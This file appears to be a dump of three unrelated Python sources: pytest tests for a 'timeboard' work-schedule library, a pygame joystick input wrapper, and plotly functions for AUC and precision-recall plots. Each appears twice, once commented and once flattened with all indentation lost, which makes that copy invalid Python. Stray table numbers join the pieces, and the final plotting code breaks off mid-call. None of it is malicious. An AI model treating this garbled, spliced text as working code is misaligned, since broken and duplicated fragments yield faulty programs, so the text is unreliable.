        assert not sdl2.is_on_duty(1)
        assert not sdl2.is_on_duty(4)
        assert clnd.default_schedule.name == 'on_duty'
        assert clnd.default_schedule.is_on_duty(1)
        assert clnd.default_schedule.is_on_duty(4)

    def test_tb_drop_schedule(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='31 Dec 2016', end='12 Jan 2017',
                            layout=[0, 1, 0, 0, 2, 0])
        clnd.add_schedule(name='sdl', selector=lambda x: x > 1)
        assert len(clnd.schedules) == 2
        sdl = clnd.schedules['sdl']
        clnd.drop_schedule(sdl)
        assert len(clnd.schedules) == 1
        with pytest.raises(KeyError):
            clnd.schedules['sdl']
        # object itself continues to exists while referenced
        assert not sdl.is_on_duty(1)

    def test_tb_schedule_names(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='31 Dec 2016', end='12 Jan 2017',
                            layout=[0, 1, 0, 0, 2, 0])
        # Non-string names are coerced to str.
        clnd.add_schedule(name=1, selector=lambda x: x > 1)
        assert len(clnd.schedules) == 2
        assert clnd.schedules['1'].name == '1'
        # Duplicate names are rejected.
        with pytest.raises(KeyError):
            clnd.add_schedule(name='1', selector=lambda x: x > 2)

    def test_tb_bad_schedule(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='31 Dec 2016', end='12 Jan 2017',
                            layout=[0, 1, 0, 0, 2, 0])
        # A non-callable selector is rejected ...
        with pytest.raises((ValueError, AttributeError)):
            clnd.add_schedule(name='sdl', selector='selector')
        # ... and so is a selector that does not take exactly one argument.
        with pytest.raises(TypeError):
            clnd.add_schedule(name='sdl', selector=lambda x,y: x+y)
class TestTimeboardWorktime(object):
    """Tests for the worktime_source constructor parameter."""

    def test_tb_default_worktime_source(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='31 Dec 2016', end='12 Jan 2017',
                            layout=[0, 1, 0, 0, 2, 0])
        # Workshift duration is the default source of worktime.
        assert clnd.worktime_source == 'duration'

    def test_tb_set_worktime_source(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='31 Dec 2016', end='12 Jan 2017',
                            layout=[0, 1, 0, 0, 2, 0],
                            worktime_source='labels')
        assert clnd.worktime_source == 'labels'

    def test_tb_bad_worktime_source(self):
        # Only recognized source names are accepted.
        with pytest.raises(ValueError):
            tb.Timeboard(base_unit_freq='D',
                         start='31 Dec 2016', end='12 Jan 2017',
                         layout=[0, 1, 0, 0, 2, 0],
                         worktime_source='bad_source')
#TODO: test timeboards with multiplied freqs
class TestTimeboardToDataFrame(object):
    """Tests for Timeboard.to_dataframe(): full export, workshift ranges,
    empty (reversed) ranges, and out-of-range location validation.

    (Dataset-dump residue fused onto the final statement has been removed.)
    """

    def test_timeboard_to_dataframe(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[0, 1, 0, 2])
        clnd.add_schedule('my_schedule', lambda x: True)
        df = clnd.to_dataframe()
        assert len(df) == 12
        # we are not hardcoding the list of columns here;
        # however, there must be at least 5 columns: two showing the start
        # and the end times of workshifts, one for the labels,
        # and two for the schedules
        assert len(list(df.columns)) >= 5
        assert 'my_schedule' in list(df.columns)

    def test_timeboard_to_dataframe_selected_ws(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[0, 1, 0, 2])
        df = clnd.to_dataframe(1, 5)
        assert len(df) == 5

    def test_timeboard_to_dataframe_reversed_ws(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[0, 1, 0, 2])
        # This is ok. This way an empty df for a void interval is created.
        df = clnd.to_dataframe(5, 1)
        assert df.empty

    def test_timeboard_to_dataframe_bad_locations(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[0, 1, 0, 2])
        # Locations outside [0, 11] are rejected in either position.
        with pytest.raises(AssertionError):
            clnd.to_dataframe(1, 12)
        with pytest.raises(AssertionError):
            clnd.to_dataframe(12, 1)
        with pytest.raises(AssertionError):
            clnd.to_dataframe(-1, 5)
        with pytest.raises(AssertionError):
            clnd.to_dataframe(5, -1)
import datetime
import pytest
import pandas as pd
class TestVersion(object):
def test_version(self):
version = tb.read_from('VERSION.txt')
assert version == tb.__version__
class TestTBConstructor(object):
def test_tb_constructor_trivial(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1])
assert clnd._timeline.labels.eq([1]*12).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_empty_layout(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[],
)
assert clnd._timeline.labels.isnull().all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_empty_layout_with_default_label(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[],
default_label=100)
assert clnd._timeline.labels.eq([100]*12).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_trivial_with_amendments(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'11 Jan 2017': 2,
'12 Jan 2017': 3})
assert clnd._timeline.labels.eq([1]*10 + [2,3]).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_amendments_outside(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'31 Dec 2016': 2,
'12 Jan 2017': 3})
assert clnd._timeline.labels.eq([1]*11 + [3]).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_bad_layout(self):
with pytest.raises(TypeError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=1)
def test_tb_constructor_duplicate_amendments(self):
with pytest.raises(KeyError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'02 Jan 2017 12:00': 2,
'02 Jan 2017 15:15': 3})
def test_tb_constructor_bad_amendments(self):
with pytest.raises(TypeError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments=[0])
def test_tb_constructor_trivial_selector(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
sdl = clnd.default_schedule
selector = clnd.default_selector
assert selector(clnd._timeline[1])
assert [selector(x) for x in clnd._timeline.labels] == [False, True] * 6
assert (sdl.on_duty_index == [1, 3, 5, 7, 9, 11]).all()
assert (sdl.off_duty_index == [0, 2, 4, 6, 8, 10]).all()
def test_tb_constructor_trivial_custom_selector(self):
def custom_selector(x):
return x>1
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2],
default_selector=custom_selector)
sdl = clnd.default_schedule
selector = clnd.default_selector
assert not selector(clnd._timeline[1])
assert [selector(x) for x in clnd._timeline.labels] == [False, False,
False, True] * 3
assert (sdl.on_duty_index == [3, 7, 11]).all()
assert (sdl.off_duty_index == [0, 1, 2, 4, 5, 6, 8, 9, 10]).all()
class TestTBConstructorWithOrgs(object):
def test_tb_constructor_week5x8(self):
week5x8 = tb.Organizer(marker='W', structure=[[1, 1, 1, 1, 1, 0, 0]])
amendments = pd.Series(index=pd.date_range(start='01 Jan 2017',
end='10 Jan 2017',
freq='D'),
data=0).to_dict()
clnd = tb.Timeboard(base_unit_freq='D',
start='28 Dec 2016', end='02 Apr 2017',
layout=week5x8,
amendments=amendments)
assert clnd.start_time == datetime.datetime(2016, 12, 28, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 4, 2, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 4, 3, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
assert clnd('28 Dec 2016').is_on_duty()
assert clnd('30 Dec 2016').is_on_duty()
assert clnd('31 Dec 2016').is_off_duty()
assert clnd('01 Jan 2017').is_off_duty()
assert clnd('10 Jan 2017').is_off_duty()
assert clnd('11 Jan 2017').is_on_duty()
assert clnd('27 Mar 2017').is_on_duty()
assert clnd('31 Mar 2017').is_on_duty()
assert clnd('01 Apr 2017').is_off_duty()
assert clnd('02 Apr 2017').is_off_duty()
class TestTimeboardSchedules(object):
def test_tb_add_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
#layout=[0, 1, 0, 0, 2, 0])
layout=['O', 'A', 'O', 'O', 'B', 'O'])
assert len(clnd.schedules) == 1
assert 'on_duty' in clnd.schedules
clnd.add_schedule(name='sdl1', selector=lambda x: x == 'B')
clnd.add_schedule(name='sdl2', selector=lambda x: x == 'C')
assert len(clnd.schedules) == 3
assert 'sdl1' in clnd.schedules
sdl1 = clnd.schedules['sdl1']
assert sdl1.name == 'sdl1'
assert not sdl1.is_on_duty(1)
assert sdl1.is_on_duty(4)
assert 'sdl2' in clnd.schedules
sdl2 = clnd.schedules['sdl2']
assert sdl2.name == 'sdl2'
assert not sdl2.is_on_duty(1)
assert not sdl2.is_on_duty(4)
assert clnd.default_schedule.name == 'on_duty'
assert clnd.default_schedule.is_on_duty(1)
assert clnd.default_schedule.is_on_duty(4)
def test_tb_drop_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
clnd.add_schedule(name='sdl', selector=lambda x: x > 1)
assert len(clnd.schedules) == 2
sdl = clnd.schedules['sdl']
clnd.drop_schedule(sdl)
assert len(clnd.schedules) == 1
with pytest.raises(KeyError):
clnd.schedules['sdl']
# object itself continues to exists while referenced
assert not sdl.is_on_duty(1)
def test_tb_schedule_names(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
clnd.add_schedule(name=1, selector=lambda x: x > 1)
assert len(clnd.schedules) == 2
assert clnd.schedules['1'].name == '1'
with pytest.raises(KeyError):
clnd.add_schedule(name='1', selector=lambda x: x > 2)
def test_tb_bad_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
with pytest.raises((ValueError, AttributeError)):
clnd.add_schedule(name='sdl', selector='selector')
with pytest.raises(TypeError):
clnd.add_schedule(name='sdl', selector=lambda x,y: x+y)
class TestTimeboardWorktime(object):
def test_tb_default_worktime_source(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
assert clnd.worktime_source == 'duration'
def test_tb_set_worktime_source(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0],
worktime_source='labels')
assert clnd.worktime_source == 'labels'
def test_tb_bad_worktime_source(self):
with pytest.raises(ValueError):
tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0],
worktime_source='bad_source')
#TODO: test timeboards with multiplied freqs
class TestTimeboardToDataFrame(object):
def test_timeboard_to_dataframe(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
clnd.add_schedule('my_schedule', lambda x: True)
df = clnd.to_dataframe()
assert len(df) == 12
# we are not hardcoding the list of columns here;
# however, there must be at least 5 columns: two showing the start
# and the end times of workshifts, one for the labels,
# and two for the schedules
assert len(list(df.columns)) >=5
assert 'my_schedule' in list(df.columns)
def test_timeboard_to_dataframe_selected_ws(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
df = clnd.to_dataframe(1, 5)
assert len(df) == 5
def test_timeboard_to_dataframe_reversed_ws(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
# This is ok. This way an empty df for a void interval is created.
df = clnd.to_dataframe(5, 1)
assert df.empty
def test_timeboard_to_dataframe_bad_locations(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
with pytest.raises(AssertionError):
clnd.to_dataframe(1, 12)
with pytest.raises(AssertionError):
clnd.to_dataframe(12, 1)
with pytest.raises(AssertionError):
clnd.to_dataframe(-1, 5)
with pytest.raises(AssertionError):
clnd.to_dataframe(5, -1) | 0.622459 | 0.616157 |
import pygame


class Controller:
    """Polled wrapper around a pygame joystick.

    processInput() snapshots button/axis/hat state once per frame; the
    previous snapshot is kept so that edge events (pressed/released) can be
    derived by comparing the two.  All ``is*`` predicates take a
    controllerInput object exposing ``inputNumber`` (an int index, or a
    ``(hat, axis)`` pair for hats) and ``threshhold`` (sic).
    """

    def __init__(self, number):
        # Joystick index; self.joystick stays None if that many sticks are
        # not plugged in, and every predicate then returns False.
        self.number = number
        self.joystick = None
        if number <= pygame.joystick.get_count() - 1:
            self.joystick = pygame.joystick.Joystick(number)
            self.joystick.init()
            self.name = self.joystick.get_name()
        # Snapshots are None until processInput() has run at least once
        # (twice for the previous* ones).
        self.previousButtons = None
        self.currentButtons = None
        self.previousAxes = None
        self.currentAxes = None
        self.previousHats = None
        self.currentHats = None

    def processInput(self):
        """Shift the current snapshot to 'previous' and re-poll the stick."""
        if self.joystick is None:
            return
        self.previousButtons = self.currentButtons
        self.currentButtons = [self.joystick.get_button(b)
                               for b in range(self.joystick.get_numbuttons())]
        self.previousAxes = self.currentAxes
        self.currentAxes = [self.joystick.get_axis(a)
                            for a in range(self.joystick.get_numaxes())]
        self.previousHats = self.currentHats
        self.currentHats = [self.joystick.get_hat(h)
                            for h in range(self.joystick.get_numhats())]

    def isButtonDown(self, controllerInput):
        """True while the button value is at or above the threshold."""
        if self.currentButtons is None:
            return False
        if len(self.currentButtons) <= controllerInput.inputNumber:
            return False
        return self.currentButtons[controllerInput.inputNumber] >= controllerInput.threshhold

    def isButtonPressed(self, controllerInput):
        """True only on the frame the button crossed above the threshold."""
        if self.currentButtons is None or self.previousButtons is None:
            return False
        if len(self.currentButtons) <= controllerInput.inputNumber:
            return False
        return (self.currentButtons[controllerInput.inputNumber] >= controllerInput.threshhold
                and self.previousButtons[controllerInput.inputNumber] < controllerInput.threshhold)

    def isButtonReleased(self, controllerInput):
        """True only on the frame the button dropped to/below the threshold.

        Bug fix: the None guard must come before len(); previously, calling
        this before the first processInput() raised TypeError on
        len(None) instead of returning False like isButtonPressed does.
        """
        if self.currentButtons is None or self.previousButtons is None:
            return False
        if len(self.currentButtons) <= controllerInput.inputNumber:
            return False
        return (self.currentButtons[controllerInput.inputNumber] <= controllerInput.threshhold
                and self.previousButtons[controllerInput.inputNumber] > controllerInput.threshhold)

    def isHatDown(self, controllerInput):
        """True while the hat axis is past the (signed) threshold."""
        if self.currentHats is None:
            return False
        if len(self.currentHats) <= controllerInput.inputNumber[0]:
            return False
        hat, axis = controllerInput.inputNumber
        # Sign of the threshold selects the direction being tested.
        if controllerInput.threshhold > 0:
            return self.currentHats[hat][axis] >= controllerInput.threshhold
        else:
            return self.currentHats[hat][axis] <= controllerInput.threshhold

    def isHatPressed(self, controllerInput):
        """True only on the frame the hat crossed past the threshold."""
        if self.currentHats is None or self.previousHats is None:
            return False
        if len(self.currentHats) <= controllerInput.inputNumber[0]:
            return False
        hat, axis = controllerInput.inputNumber
        if controllerInput.threshhold > 0:
            return (self.currentHats[hat][axis] >= controllerInput.threshhold
                    and self.previousHats[hat][axis] < controllerInput.threshhold)
        else:
            return (self.currentHats[hat][axis] <= controllerInput.threshhold
                    and self.previousHats[hat][axis] > controllerInput.threshhold)

    def isHatReleased(self, controllerInput):
        """True only on the frame the hat came back from past the threshold."""
        if self.currentHats is None or self.previousHats is None:
            return False
        if len(self.currentHats) <= controllerInput.inputNumber[0]:
            return False
        hat, axis = controllerInput.inputNumber
        if controllerInput.threshhold > 0:
            return (self.currentHats[hat][axis] < controllerInput.threshhold
                    and self.previousHats[hat][axis] >= controllerInput.threshhold)
        else:
            return (self.currentHats[hat][axis] > controllerInput.threshhold
                    and self.previousHats[hat][axis] <= controllerInput.threshhold)

    def isAxisDown(self, controllerInput):
        """True while the axis is past the (signed) threshold."""
        if self.currentAxes is None:
            return False
        if len(self.currentAxes) <= controllerInput.inputNumber:
            return False
        if controllerInput.threshhold > 0:
            return self.currentAxes[controllerInput.inputNumber] >= controllerInput.threshhold
        else:
            return self.currentAxes[controllerInput.inputNumber] <= controllerInput.threshhold

    def isAxisPressed(self, controllerInput):
        """True only on the frame the axis crossed past the threshold."""
        if self.currentAxes is None or self.previousAxes is None:
            return False
        if len(self.currentAxes) <= controllerInput.inputNumber:
            return False
        if controllerInput.threshhold > 0:
            return (self.currentAxes[controllerInput.inputNumber] >= controllerInput.threshhold
                    and self.previousAxes[controllerInput.inputNumber] < controllerInput.threshhold)
        else:
            return (self.currentAxes[controllerInput.inputNumber] <= controllerInput.threshhold
                    and self.previousAxes[controllerInput.inputNumber] > controllerInput.threshhold)

    def isAxisReleased(self, controllerInput):
        """True only on the frame the axis came back from past the threshold."""
        if self.currentAxes is None or self.previousAxes is None:
            return False
        if len(self.currentAxes) <= controllerInput.inputNumber:
            return False
        if controllerInput.threshhold > 0:
            return (self.currentAxes[controllerInput.inputNumber] < controllerInput.threshhold
                    and self.previousAxes[controllerInput.inputNumber] >= controllerInput.threshhold)
        else:
            return (self.currentAxes[controllerInput.inputNumber] > controllerInput.threshhold
                    and self.previousAxes[controllerInput.inputNumber] <= controllerInput.threshhold)
class Controller:
def __init__(self, number):
self.number = number
self.joystick = None
if number <= pygame.joystick.get_count()-1:
self.joystick = pygame.joystick.Joystick(number)
self.joystick.init()
self.name = self.joystick.get_name()
self.previousButtons = None
self.currentButtons = None
self.previousAxes = None
self.currentAxes = None
self.previousHats = None
self.currentHats = None
def processInput(self):
if self.joystick is None:
return
self.previousButtons = self.currentButtons
self.currentButtons = []
for b in range(self.joystick.get_numbuttons()):
self.currentButtons.append(self.joystick.get_button(b))
self.previousAxes = self.currentAxes
self.currentAxes = []
for a in range(self.joystick.get_numaxes()):
self.currentAxes.append(self.joystick.get_axis(a))
self.previousHats = self.currentHats
self.currentHats = []
for h in range(self.joystick.get_numhats()):
self.currentHats.append(self.joystick.get_hat(h))
def isButtonDown(self, controllerInput):
if self.currentButtons is None:
return False
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
return self.currentButtons[controllerInput.inputNumber] >= controllerInput.threshhold
def isButtonPressed(self, controllerInput):
if self.currentButtons is None or self.previousButtons is None:
return False
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
return self.currentButtons[controllerInput.inputNumber] >= controllerInput.threshhold and self.previousButtons[controllerInput.inputNumber] < controllerInput.threshhold
def isButtonReleased(self, controllerInput):
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
if self.currentButtons is None or self.previousButtons is None:
return False
return self.currentButtons[controllerInput.inputNumber] <= controllerInput.threshhold and self.previousButtons[controllerInput.inputNumber] > controllerInput.threshhold
def isHatDown(self, controllerInput):
if self.currentHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold
def isHatPressed(self, controllerInput):
if self.currentHats is None or self.previousHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] < controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] > controllerInput.threshhold
def isHatReleased(self, controllerInput):
if self.currentHats is None or self.previousHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] < controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] > controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold
def isAxisDown(self, controllerInput):
if self.currentAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] >= controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] <= controllerInput.threshhold
def isAxisPressed(self, controllerInput):
if self.currentAxes is None or self.previousAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] >= controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] < controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] <= controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] > controllerInput.threshhold
def isAxisReleased(self, controllerInput):
if self.currentAxes is None or self.previousAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] < controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] >= controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] > controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] <= controllerInput.threshhold | 0.419767 | 0.091382 |
from typing import Optional
import config
import pandas as pd
import plotly.express as px
from pandas import DataFrame
from plotly.graph_objs import Figure
# Public API of this plotting module.
__all__ = [
    "plot_auc_dist",
    "plot_auc_scatter",
    "plot_pr_curve_per_organism",
    "plot_pr_scatter",
    "plot_score_boxplot",
]

# Plotted scores (precision, recall, AUC) live in [0, 1]; pad each axis
# by 0.05 so points on the boundary are fully visible.
XRANGE = [-0.05, 1.05]
YRANGE = [-0.05, 1.05]
# Bin count for the AUC histogram.
NBINS = 100
def plot_pr_curve_per_organism(df: DataFrame) -> Figure:
    """Draw one precision-recall curve per organism, colored by domain."""
    hover_columns = [
        config.label.auc,
        "domain",
        config.label.hmmer_hits,
        "e-value",
    ]
    fig = px.line(
        df,
        x=config.label.recall,
        y=config.label.precision,
        color="domain",
        line_group="organism",
        hover_data=hover_columns,
        hover_name="organism",
        title="Precision-Recall curves, organism-wise",
    )
    fig.update_xaxes(range=XRANGE)
    fig.update_yaxes(range=YRANGE)
    return fig
def plot_auc_dist(df: DataFrame, per: config.Per) -> Figure:
    """
    Plot the AUC distribution as a histogram with a rug margin.

    Parameters
    ----------
    df
        DataFrame holding the AUC values (one row per entity is kept via
        drop_duplicates).
    per
        Level of aggregation (e.g. ``config.Per.organism``).

    Returns
    -------
    Figure
        Plotly histogram figure.
    """
    if per == config.Per.organism:
        color: Optional[str] = "domain"
        fields = ["organism", "domain"]
        hover_data = [config.label.auc, config.label.hmmer_hits]
    else:
        color = None
        # dict.fromkeys de-duplicates while preserving order; the previous
        # list(set(...)) produced a different column order on every run.
        hover_data = list(dict.fromkeys(
            [per.name, "clan", config.label.auc, config.label.hmmer_hits]
        ))
        fields = list(dict.fromkeys(
            [per.name, "clan", config.label.auc, config.label.hmmer_hits]
        ))
    title = f"AUC distribution, {per.name}-wise"
    # Each entity must contribute a single observation to the histogram.
    df = df.drop_duplicates(fields)
    fig = px.histogram(
        df,
        x=config.label.auc,
        color=color,
        title=title,
        marginal="rug",
        hover_data=hover_data,
        hover_name=per.name,
        nbins=NBINS,
    )
    fig.update_xaxes(range=XRANGE)
    return fig
def plot_auc_scatter(df: DataFrame, per: config.Per) -> Figure:
    """
    Plot per-entity AUC values as a scatter (sorted by AUC) with a violin margin.

    Parameters
    ----------
    df
        DataFrame holding the AUC values (one row per entity is kept via
        drop_duplicates).
    per
        Level of aggregation (e.g. ``config.Per.organism``).

    Returns
    -------
    Figure
        Plotly scatter figure.
    """
    if per == config.Per.organism:
        color: Optional[str] = "domain"
        hover_name = per.name
        hover_data = ["domain", config.label.auc, config.label.hmmer_hits]
        fields = ["organism", "domain"]
    else:
        color = None
        hover_name = per.name
        hover_data = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
        fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
    # dict.fromkeys de-duplicates while preserving order; the previous
    # list(set(...)) was order-nondeterministic.
    fields = list(dict.fromkeys(fields))
    # One observation per entity, plotted in increasing AUC order.
    df = df.drop_duplicates(fields)
    df = df.sort_values(config.label.auc)
    title = f"AUC scatter, {per.name}-wise"
    fig = px.scatter(
        df,
        x=per.name,
        y=config.label.auc,
        color=color,
        title=title,
        hover_data=hover_data,
        hover_name=hover_name,
        marginal_y="violin",
    )
    fig.update_layout(showlegend=False)
    fig.update_yaxes(range=YRANGE)
    return fig
def plot_score_boxplot(dfe: DataFrame, per: config.Per) -> Figure:
    """
    Plot precision, recall and F1 as grouped boxplots across e-value cutoffs.

    Parameters
    ----------
    dfe
        DataFrame with one row per entity and e-value cutoff, holding
        precision, recall and f1-score columns.
    per
        Level of aggregation (e.g. ``config.Per.organism``).

    Returns
    -------
    Figure
        Plotly box figure.
    """

    def melt(score_column, score_name):
        # Move one score column into a common 'value' column and tag the
        # copy with the score's name so px.box can group by it.
        part = dfe.copy()
        part["value"] = part[score_column]
        del part[score_column]
        part["score"] = score_name
        return part

    if per == config.Per.organism:
        hover_data = [
            "organism",
            "domain",
            config.label.auc,
            config.label.hmmer_hits,
        ]
    else:
        hover_data = [
            per.name,
            "clan",
            config.label.auc,
            config.label.hmmer_hits,
        ]
        # dict.fromkeys de-duplicates deterministically (e.g. if per.name
        # collides with another column); list(set(...)) shuffled the order.
        hover_data = list(dict.fromkeys(hover_data))
    # NOTE: the original also computed a `fields` list in both branches, but
    # it was never used; that dead code has been removed.
    dfe = pd.concat([
        melt(config.label.precision, "precision"),
        melt(config.label.recall, "recall"),
        melt(config.label.f1score, config.label.f1score),
    ])
    title = f"Score boxplot, {per.name}-wise"
    fig = px.box(
        dfe,
        x="-log10(e-value)",
        color="score",
        y="value",
        title=title,
        hover_name=per.name,
        hover_data=hover_data,
    )
    fig.update_yaxes(range=YRANGE)
    return fig
def plot_pr_scatter(dfe: DataFrame, per: config.Per, size_max: int) -> Figure:
    """
    Plot Precision vs Recall as an animated scatter (one frame per e-value).

    Parameters
    ----------
    dfe
        DataFrame with one row per entity and e-value cutoff.
    per
        Level of aggregation (e.g. ``config.Per.organism``).
    size_max
        Maximum marker size; markers scale with the number of HMMER hits.

    Returns
    -------
    Figure
        Plotly scatter figure.
    """
    if per == config.Per.organism:
        color: Optional[str] = "domain"
        hover_data = [
            "organism",
            "domain",
            config.label.f1score,
            config.label.auc,
            config.label.hmmer_hits,
        ]
    else:
        color = None
        hover_data = [
            per.name,
            "clan",
            config.label.f1score,
            config.label.auc,
            config.label.hmmer_hits,
        ]
    title = f"Precision vs Recall, {per.name}-wise"
    fig = px.scatter(
        dfe,
        x=config.label.recall,
        y=config.label.precision,
        animation_frame="e-value",
        color=color,
        title=title,
        size=config.label.hmmer_hits,
        size_max=size_max,
        hover_data=hover_data,
        hover_name=per.name,
    )
    fig.update_layout(showlegend=False)
    fig.update_xaxes(range=XRANGE)
    fig.update_yaxes(range=YRANGE)
    # Bug fix: this function is annotated -> Figure and exported in __all__,
    # but it ended with fig.show() and implicitly returned None.  Return the
    # figure like every sibling plot_* function does.
    return fig
import config
import pandas as pd
import plotly.express as px
from pandas import DataFrame
from plotly.graph_objs import Figure
__all__ = [
"plot_auc_dist",
"plot_auc_scatter",
"plot_pr_curve_per_organism",
"plot_pr_scatter",
"plot_score_boxplot",
]
XRANGE = [-0.05, 1.05]
YRANGE = [-0.05, 1.05]
NBINS = 100
def plot_pr_curve_per_organism(df: DataFrame) -> Figure:
    """Draw one Precision-Recall curve per organism, colored by domain."""
    hover_columns = [config.label.auc, "domain", config.label.hmmer_hits, "e-value"]
    figure = px.line(
        df,
        x=config.label.recall,
        y=config.label.precision,
        color="domain",
        line_group="organism",
        hover_data=hover_columns,
        hover_name="organism",
